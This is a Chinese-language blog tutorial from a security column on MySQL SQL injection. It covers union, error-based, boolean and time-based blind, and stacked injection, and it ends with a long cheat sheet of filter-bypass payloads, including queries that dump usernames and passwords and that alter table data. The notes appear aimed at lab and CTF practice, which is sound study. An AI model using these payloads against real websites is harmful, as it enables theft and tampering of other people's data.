今日学习目标:
学习了解sql注入漏洞
✅创作者:贤鱼
⏰预计时间:35分钟
个人主页:贤鱼的个人主页
专栏系列:网络安全
⚠如有需要可以查看以往文章:
一文了解数据库操作–mysql(25分钟)
具体详细介绍在专栏中有单独介绍,可以查看
只有了解才能注入
SQL注入
- union注入
- 原理
- 过程
- 判断数字或者字符串
- 判断字段数
- 判断回显点
- 注入库名
- 注入表名
- 注入列名
- 查数据
- 报错注入
- 原理
- 注入
- extractvalue
- 双查询注入
- 双列名查询
- 报错函数
- geometrycollection()
- multipoint()
- polygon()
- multipolygon()
- linestring()
- multilinestring()
- exp()
- ST_LatFromGeoHash()
- ST_LongFromGeoHash()
- GTID_SUBSET()
- GTID_SUBTRACT()
- ST_PointFromGeoHash()
- procedure analyse()
- 盲注
- 布尔盲注
- 原理
- 布尔盲注payload构造步骤
- 截取字符串
- substr()
- mid
- rigth()
- left()
- regexp
- rlike
- trim
- insert
- 字符串定位函数
- 比较
- rlike/regexp
- between
- in
- and,or减法运算
- 脚本
- 时间盲注
- 原理
- 时间盲注payload步骤
- 条件语句构造
- and
- or
- 延时操作
- sleep
- benchmark
- 笛卡尔积延时
- 正则dos延时
- 脚本
- 报错盲注
- 原理
- 堆叠注入
- 原理
- 实施方法
- table
- handler
- 原理
- 模板
- 使用方法
- 修改数据
- 前提
- 具体方法
- 绕过方法大全
- 常见绕过方式
- 关键字绕过
- 字符串
- and/or
- and/or/union
- and/or/union/where
- and/or/union/where/limit/group by
- and/or/union/where/limit/group by/select
- 空格
- 逗号
- 单双引号
- 结束语
union注入
原理
利用union关键字,union会将前后两次查询结果拼在一起,由于是联合查询,必须保证字段数一致,也就是两个查询结果有相同列数
过程
1 判断数字或者字符串注入类型
2 判断字段数,查询有几个字段
3 判断回显点,有些字段存在但是不会输出内容,我们需要找到会显示的字段数
4 注入库名
5 注入表名
6 注入列名
7 查数据
判断数字或者字符串
输入:
id=1
id=1’
id=1’–+(–+是注释的意思)
为什么有时候加个单引号会报错,而加个注释又会查询成功呢?
举个栗子:‘xxx xxx xxx’这样子是正常的
‘xxx xxx id’ xxx’ 这样子第二个’是不是就会报错
‘xxx xxx id’–+xxx’这样子后面的‘就被注释掉了,也就不会报错了
判断字段数
上文说过,union前后查询字段数必须一致,所以我们还要对字段数进行判断。在此可以利用order by n进行判断,意思是根据n个字段排序,如果不存在这个字段就会报错
这里依次查询1,2,3,4,5
4和5都会报错,所以可以得知,字段数为3
当然 union也是可以用的
第一个是1查询的,后面三个是1,2,3查询的,1,2,3,4依旧报错
判断回显点
这里的操作和上文union查询字段数一样
很明显,字段数3中,我们的1,2,3都输出了,所以回显点就是1,2,3
注入库名
查询到回显点,就要开始注入了,想要注入数据,必须得到他的库名
获得库名可以用database()函数
如图:输入id=-1’ union select 1,2,3 –+
我们再回显点2位置注入,发现成功获得了库名
当然,换个位置效果一样
分享几个查询数据库的方法
id=-1' union select 1,database(),3 --+查看所有数据库名称id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata --+id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata limit1,1 --+ # 查询第2个数据也可以用group_concat()函数将查询结果内容放入同一行id=-1' union select 1,group_concat(SCHEMA_name),3 from information_schema.schemata --+
注入表名
有了库名就可以查询表名了
id=-1' union select 1,group_concat(table_name),3 from information_schema.tableswhere table_schema='库名' --+
就可以查询到表名了
注入列名
查询到库名和表名就可以查询列名
d=-1' union select 1,group_concat(column_name),group_concat(data_type) frominformation_schema.columns where table_schema='库名' and table_name='表名' --+
查数据
接下来就是查询数据了
id=-1' union select 1,username,password from security.users limit 0,1 --+
id=-1' union select 1,concat(username,0x5c,password),3 from security.users limit 0,1 --+
id=-1' union select 1,group_concat(username,0x5c,password),3 from security.users--+
concat() :将两个字段结合成为一个字段
报错注入
原理
利用数据库某些机制,人为制造错误,使得查询的结果出现在报错中
sql查询的星系会被报错语句返回到界面上
注入
extractvalue
extractvale(MXL_document,xpath_string);
第一个参数为xml字符串
第二个参数为xpath格式字符串
作用,从xml中返回包含查询字符串
注意! 查询时用group_concat或者limit
记得用substr函数进行截取,extractvalue报错信息最多32个字符
后面的程序和上文union注入差不多,如有需要可以查看
双查询注入
上文所说查询时用group_concat或者limit
有些版本的mysql中query不能用聚合函数,面对这种情况,我们只能从口袋里掏出limit
用limit将结果一行一行爆出
双列名查询
join:
用于将两个表连接
在sql查询时,如果查询的两个列名是一样的就会报错,我们可以利用这个机制注入
报错函数
geometrycollection()
geometrycollection((select * from(select * from(select
user())a)b));(5.1>=version<=5.5.48 )
multipoint()
multipoint((select * from(select user())b));
(5.1>=version<=5.5.48 )
polygon()
select polygon((select * from(select * from(select
user())a)b));(5.1>=version<=5.5.48 )
multipolygon()
multipolygon((select * from(select * from(select
user())a)b));(5.1>=version<=5.5.48 )
linestring()
linestring((select * from(select * from(select user())a)b));
(5.1>=version<=5.5.48 )
multilinestring()
multilinestring((select * from(select * from(select
user())a)b));(5.1>=version<=5.5.48 )
exp()
exp(~(select * from(select user())a));
(5.1>=version<=5.5.48 )
ST_LatFromGeoHash()
select ST_LatFromGeoHash(user());(>=5.7)
ST_LongFromGeoHash()
select ST_LongFromGeoHash(user());(*>=5.7)
GTID_SUBSET()
select GTID_SUBSET(user(),1);(*>=5.7)
GTID_SUBTRACT()
select GTID_SUBTRACT(user(),1);(*>=5.7)
ST_PointFromGeoHash()
select ST_PointFromGeoHash(user(),1);(*>=5.7)
procedure analyse()
procedure
analyse(extractvalue(1,concat(0x3a,user())),1); 放在语句
末尾,(*<=5.6.17)
盲注
布尔盲注
原理
存在sql注入漏洞的地方,但是不会会先数据,只能看到是否执行成功,这样子就不能通过注入数据回显了,就需要盲注,盲注对一个数据多次测试
举个例子
如果"库名"第一个字母是a,就回显“查询成功”,反之“查询失败”;如果"库名"第一个字母是b,就回显“查询成功”,反之“查询失败”;......如果"库名"第一个字母是z,就回显“查询成功”,反之“查询失败”;......
名字可能由任何字符组成,我们如果匹配上了,就把他记录下来,一位一位的比较,就可以获得我们要的数据了
当然,如果手动比较,电脑和我的手一定会炸掉一个
所以我们需要写脚本,在后文会介绍到。
布尔盲注payload构造步骤
确定注入点,找到回显不同,例如:内容不同或者http头部不同
我们该如何构造语句呢?
举个栗子
SELECT name, mojority FROM student WHERE student_id = '0' or substr((QUERY),1,1) = 'a'
SELECT name, mojority FROM student WHERE student_id = ‘0’ or substr((QUERY),1,1) = ‘a’
这个部分就是我们需要构造的部分
构造语句的两个重点:
字符串如何截取
比较结果是否相等
所以盲注就相当于把注入内容一位一位拆开然后比较内容,最后比较出啥输出啥,然后将比较到的每一位字符都输出就是我们的答案了
截取字符串
substr()
使用方法:
substr(要截取的字符串,从哪一位开始,截取多长)
例如
select substr((select database()),1,1);
mid
用法和substr完全相同!!可以互相绕过过滤
rigth()
使用方法
right(要截取的字符串,截取长度)
表示截取字符串右边几位
注意:
配合ascii/ord一起使用,这两个函数是返回传入字符串的首字母的ASCII码
使用方法:
ascii((right(要截取的字符串,x)))
返回的内容是从右往左x位的ascii码
举个栗子
select ascii(right((select database()), 2));
left()
使用方法:
left(要截取的字符串,截取长度)
表示截取字符串左边第几位
注意:
配合reverse()+ascii/ord使用,用法和上面类似
举个栗子:
elect ascii(reverse(left((select database()), 2));
regexp
使用方法:
binary 目标字符串 regexp 正则
判断一个字符串是否匹配一个正则表达式
举个栗子:
select (select database()) regexp binary '^sec'
rlike
用法和regexp雷同
trim
trim(leading ‘a’ from ‘abcd’)
表示移除句首a,会返回abc,如果将from前的a改成b,则会返回abcd
insert
用法
insert(字符串,起始位置,长度,替换成什么)
字符串定位函数
INSTR(str,substr)–> 返回字符串 str 中子字符串的第一个出现位置,否则为0FIND_IN_SET(str,strlist)–> 返回字符串 str 中子字符串的第一个出现位置,否则为0LOCATE(substr,str,pos)–> 返回字符串 str中子字符串substr的第一个出现位置, 起始位置在pos。如若substr 不在str中,则返回值为0POSITION(substr IN str)–> 返回子串 substr 在字符串 str 中第一次出现的位置。如果子串substr 在 str 中不存在,返回值为 0
用法: locate(substr, str, pos) 字符串 str中子字符串substr的第一个出现位置, 起始位置在
pos。如若substr 不在str中,则返回值为0。
比较
rlike/regexp
上文有讲,截取+比较结合体
between
用法
expr between 下界 and 上界
意思是是否expr>=下界 &&expr<=上界
in
用法
expr0 in(expr0,expr1,expr2)
and,or减法运算
可以用一个 true 去与运算一个ASCII码减去一个数字,如果返回0则说明减去的数字就是所判断的
ASCII码:
可以用一个 false 去或运算一个ASCII码减去一个数字,如果返回0则说明减去的数字就是所判断的
ASCII码:
脚本
这里避免大家看着无聊,本文主要是总结,所以脚本就放在下面内容了
35分钟了解sql注入-盲注(三)
时间盲注
原理
有那么一种可能,查询成功失败返回的都一样,那么我们就无法通过返回结果看比较是否成功了,这时候就需要从裤裆里掏出时间盲注了!!!
介绍下原理:
如果"数据库名"的第1个字母是a,你就睡眠5秒,否则就直接回显......如果"数据库名"的第2个字母是a,你就睡眠5秒,否则就直接回显如果"数据库名"的第2个字母是b,你就睡眠5秒,否则就直接回显......后面以此类推
时间盲注payload步骤
和上文布尔盲注差不多,只不过在构造条件语句时关注延时操作而不是返回值了
条件语句构造
往上翻,啥都有
补充一下
and
如果and前为真,执行后面内容
(condition) AND sleep(5)
or
如果前面为假才执行后面
!(condition) OR sleep(5)
延时操作
这里还是要写一下
sleep
意思是休眠指定事件后继续
栗子:
SELECT if(ascii(substr((QUERY),8,1))=121,sleep(5),0);
benchmark
用法
benchmark(执行次数,执行什么)
栗子:
SELECT benchmark(10000000,sha1('test'));
笛卡尔积延时
注意当查询发生在多个表中时,会将多个表已笛卡尔积的形式联合起来,在进行查询,非常费时;
SELECT count(*) FROM information_schema.columns A,information_schema.columns B, information_schema.columns C;
正则dos延时
原理:
通过费时正则匹配操作消耗时间
栗子:
select concat(rpad('a',3999999,'a'),rpad('a',3999999,'a')) RLIKEconcat(repeat('(a.*)+',30),'b');
脚本
35分钟了解sql注入-盲注(三)
报错盲注
用法和延时盲注基本一致,但是可以用来绕过过滤延时盲注的关键字
原理
原理就是比较条件为真时,通过调用产生错误的函数
if(condition,报错,不报错)
堆叠注入
原理
当使用了支持多语句查询的函数时,数据库就会造成堆叠注入
实施方法
例如:
table / handler
table
作用相当于select
handler
这个好好讲一下
原理
总所周知,在sql注入中可以使用select,可如果题目中过滤了select该怎么办呢?我们可以使用handler,这个语句可以一行一行显示库中内容
模板
handler user open;
handler user read;读出什么输出什么
handler user read first [where username=‘admin’];
handler user read next [where username=‘admin’]; – [] 中的内容意味着可加可不加
user是表名
使用方法
首先抓包,然后鼠标右键send to repeater
用’;闭合前段,然后输入handler user open;handler user read next;,这里first时代表第一个内容,next是后面的内容,user是表名,我们通过多次用handler user read next可以看到表中所有的内容,所以多次复制handler user read next;就可以了
修改数据
前提
在修改数据的前提下,我们要先想方法爆出对方的库名,以及我们需要修改的列名,有些注入可能有很多列,我们要知道他们才能做到修改数据
具体方法
在决定使用这个方法的同时,我们需要看看对方过滤的内容,如果发现可以通过其他方法,还是不要用这个为好⚠
下面来具体的实现一下:
众所周知,在做题之前要看一下网页源代码
这里可以看到,在最后面的提示内容告诉了我们很多东西
表名这不就有了
接下来用bp抓包
这里用’;闭合前面,然后按照UPDATE SET 字段1=值1, 字段2=值2, … WHERE …;的格式来修改答案,
修改完毕将值发回去就可以发现成功注入了
绕过方法大全
常见绕过方式
大小写绕过:如果在检测关键字区分大小写了,才可以使用 (mysql关键字不区分大小写)
双写绕过:如果代码的过滤原理是检测关键字并且将它删除,如果只删除依次,就可以利用这个绕过
url编码:乳沟代码中多执行一次url解码过程就可以使用这个方法
关键字绕过
字符串
主要思想是利用函数或者十六进制数拼接目标字符串
and/or
&& —和and作用相同
|| —和or作用相同
and/or/union
try一下盲注
1'||(select user from xxx where xxx)='admin'
and/or/union/where
可以使用limit或者group by
-- limit1||( select user from users limit 1)='admin' limit 1,11||( select user from users limit 1)='admin' limit 1 offset 1-- group by1||(select user from users group by user_id having user_id=1 )= 'admin'
and/or/union/where/limit/group by
emmm,换成substr(group_concat(XXX))一个一个包吧
and/or/union/where/limit/group by/select
盲注—你值得拥有
1||user_id is not null -- 存在该字段正常查询,不存在报错1||substr(user,1,1)=0×611||substr(user,1,1)=unhex(61)
空格
select/**/username/**/from/**/user; -- /**/ 使用注释select/*!username*//*!from*/user; -- /*!*/ 内联注释,内联注释中的内容也会被当作代码执行select(username)from(user); -- 使用括号绕过select%0busername%0bfrom%0buser; -- 如果使用url传参时可以使用其他的空白符号(将其进行URL编码)绕过:%09:TAB 键(水平); %0a: 新建一行; %0b:TAB 键(垂直); %0c:新的一页;%0d:return 功能;select`username`from`user`; -- 对于表名和列名可以用反引号包裹起来。
逗号
-- 绕过select中字段间的逗号,使用joinselect * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);-- 绕过if中的逗号select username from user where username='admin' or (CASE WHEN (1=12) THEN 1ELSE 0 END)-- 绕过substr中逗号Substr(DATABASE() FROM pos FOR len), mid(DATABASE() FROM 1 FOR 1)-- 绕过limit中逗号Limit 1 offset 1select top 5 * from table
单双引号
如果被转义,尝试宽字节注入
如果’被改成了’,就无法用引号闭合sql语句中的引号了
结束语
sql注入的内容就早这里了,如果对网络安全感兴趣的话可以订阅专栏,会持续更新网络安全方面知识